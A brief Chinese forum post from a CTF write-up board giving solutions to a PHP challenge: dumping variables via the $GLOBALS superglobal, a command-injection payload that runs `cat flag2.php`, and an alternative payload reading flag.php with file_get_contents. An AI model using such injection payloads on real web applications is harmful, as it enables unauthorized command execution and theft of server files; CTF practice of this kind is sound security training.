利用超全局变量GLOBALS$GLOBALS — 引用全局作用域中可用的全部变量
index.php?args=GLOBALS
利用命令注入:
index2.php?hello=1);echo `cat flag2.php`;//
另一种利用方法:
index2.php?hello=file_get_contents(%27flag.php%27)
打赏我,让我更有动力~
Track-子羽
用户组:管理员
积分:0 金币:1081.40
主题: 49 帖子: 51
© 2016 - 2022 掌控者 All Rights Reserved.
返回首页
CTF&WP专版
